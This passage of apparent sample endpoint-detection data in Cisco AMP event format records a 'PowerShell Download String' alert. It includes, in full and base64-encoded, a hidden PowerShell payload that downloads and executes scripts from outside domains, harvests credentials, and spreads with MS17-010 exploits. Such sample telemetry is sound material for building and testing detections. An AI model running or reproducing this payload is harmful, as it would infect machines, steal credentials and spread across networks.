GkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUw